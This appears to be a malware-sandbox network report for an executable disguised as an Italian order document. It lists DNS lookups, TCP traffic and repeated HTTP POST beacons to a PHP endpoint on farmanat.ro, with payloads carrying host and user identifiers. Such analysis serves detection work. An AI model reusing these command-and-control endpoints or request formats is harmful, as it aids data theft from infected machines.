                                              Nov 25, 2021 10:55:27.845366001 CET8050717176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.861280918 CET8050717176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.861335993 CET8050717176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:27.861496925 CET5071780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.861552000 CET5071780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:27.895723104 CET8050717176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.239470959 CET5071880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.272844076 CET8050718176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.273089886 CET5071880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.274621964 CET5071880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.307925940 CET8050718176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.308180094 CET5071880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.341624975 CET8050718176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.358278990 CET8050718176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.358335018 CET8050718176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.358519077 CET5071880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.358572006 CET5071880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.392182112 CET8050718176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.721184015 CET5071980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.755263090 CET8050719176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.755517006 CET5071980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.757055044 CET5071980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.791196108 CET8050719176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.791507006 CET5071980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.825608969 CET8050719176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.842794895 CET8050719176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.842849970 CET8050719176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:28.843125105 CET5071980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.843225002 CET5071980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:28.877559900 CET8050719176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.237399101 CET5072080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.271519899 CET8050720176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.271694899 CET5072080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.273209095 CET5072080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.307348013 CET8050720176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.307553053 CET5072080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.341520071 CET8050720176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.358542919 CET8050720176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.358597994 CET8050720176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.358817101 CET5072080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.358870029 CET5072080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.393126011 CET8050720176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.668443918 CET5072180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.701725006 CET8050721176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.702013016 CET5072180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.703562975 CET5072180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.736772060 CET8050721176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.736932039 CET5072180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.770205021 CET8050721176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.790647984 CET8050721176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.790687084 CET8050721176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:29.790831089 CET5072180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.790868044 CET5072180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:29.824417114 CET8050721176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.107253075 CET5072280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.141161919 CET8050722176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.141381025 CET5072280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.142951012 CET5072280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.176672935 CET8050722176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.177015066 CET5072280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.210743904 CET8050722176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.227924109 CET8050722176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.227933884 CET8050722176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.228290081 CET5072280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.228298903 CET5072280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.262187958 CET8050722176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.542650938 CET5072380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.576185942 CET8050723176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.576374054 CET5072380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.577953100 CET5072380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.611347914 CET8050723176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.611521959 CET5072380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.644848108 CET8050723176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.660511971 CET8050723176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.660561085 CET8050723176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:30.660729885 CET5072380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.660778046 CET5072380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:30.694086075 CET8050723176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.059324980 CET5072480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.092771053 CET8050724176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.092967987 CET5072480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.094476938 CET5072480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.127827883 CET8050724176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.128005981 CET5072480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.161488056 CET8050724176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.186337948 CET8050724176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.186393023 CET8050724176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.186702967 CET5072480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.186784983 CET5072480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.220356941 CET8050724176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.558415890 CET5072580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.592605114 CET8050725176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.592817068 CET5072580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.594377041 CET5072580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.628323078 CET8050725176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.628566980 CET5072580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.662844896 CET8050725176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.680608034 CET8050725176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.680663109 CET8050725176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:31.680942059 CET5072580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.681027889 CET5072580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:31.715241909 CET8050725176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.072190046 CET5072680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.106281042 CET8050726176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.106590033 CET5072680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.108072042 CET5072680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.142030954 CET8050726176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.142311096 CET5072680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.176435947 CET8050726176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.199045897 CET8050726176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.199110985 CET8050726176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.199400902 CET5072680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.199497938 CET5072680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.233841896 CET8050726176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.602588892 CET5072780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.636650085 CET8050727176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.636957884 CET5072780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.638412952 CET5072780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.672389984 CET8050727176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.672657967 CET5072780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.706537008 CET8050727176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.723047018 CET8050727176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.723141909 CET8050727176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:55:32.723292112 CET5072780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.723306894 CET5072780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:55:32.757091045 CET8050727176.223.209.128192.168.11.20

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2021 10:47:50.042912960 CET6224253192.168.11.201.1.1.1
                                              Nov 25, 2021 10:47:51.052072048 CET6224253192.168.11.209.9.9.9
                                              Nov 25, 2021 10:47:51.302644014 CET53622421.1.1.1192.168.11.20
                                              Nov 25, 2021 10:47:51.432888031 CET53622429.9.9.9192.168.11.20
                                              Nov 25, 2021 10:47:53.898544073 CET6125853192.168.11.201.1.1.1
                                              Nov 25, 2021 10:47:54.168392897 CET53612581.1.1.1192.168.11.20

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 25, 2021 10:47:50.042912960 CET192.168.11.201.1.1.10xa8afStandard query (0)fabricraft.co.zaA (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:51.052072048 CET192.168.11.209.9.9.90xa8afStandard query (0)fabricraft.co.zaA (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:53.898544073 CET192.168.11.201.1.1.10x3bd2Standard query (0)farmanat.roA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 25, 2021 10:47:51.302644014 CET1.1.1.1192.168.11.200xa8afNo error (0)fabricraft.co.za197.242.150.64A (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:51.432888031 CET9.9.9.9192.168.11.200xa8afNo error (0)fabricraft.co.za197.242.150.64A (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:54.168392897 CET1.1.1.1192.168.11.200x3bd2No error (0)farmanat.ro176.223.209.128A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • fabricraft.co.za
                                              • farmanat.ro

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049816197.242.150.64443C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.11.2049817176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:47:54.204528093 CET6223OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 178
                                              Connection: close
                                              Nov 25, 2021 10:47:54.238023996 CET6223OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: 'ckav.ruArthur468325W1064_038k028278665D4ACB73EF64D459A5U5gS
                                              Nov 25, 2021 10:47:54.380963087 CET6224INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:47:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              10192.168.11.2049845176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:06.992096901 CET6319OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:07.026221991 CET6319OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:07.107255936 CET6319INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              100192.168.11.2049937176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:01.916305065 CET6453OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:01.950459003 CET6453OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:02.000180006 CET6454INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              101192.168.11.2049938176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:02.470139980 CET6454OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:02.503863096 CET6455OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:02.553404093 CET6455INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              102192.168.11.2049939176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:03.002783060 CET6456OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:03.037201881 CET6456OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:03.092166901 CET6456INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              103192.168.11.2049940176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:03.489950895 CET6457OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:03.523461103 CET6457OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:03.577493906 CET6458INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              104192.168.11.2049941176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:03.973710060 CET6458OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:04.007999897 CET6459OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:04.058206081 CET6459INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              105192.168.11.2049942176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:04.469326019 CET6460OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:04.503623009 CET6460OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:04.553472996 CET6460INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              106192.168.11.2049943176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:05.006356955 CET6461OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:05.039913893 CET6461OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:05.094136000 CET6462INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              107192.168.11.2049944176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:05.526807070 CET6462OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:05.560389996 CET6463OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:05.609328032 CET6463INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              108192.168.11.2049948176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:06.029714108 CET6464OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:06.063983917 CET6465OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:06.113828897 CET6465INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:05 GMT
                                              Content-Type: text/html; charset=UTF-8
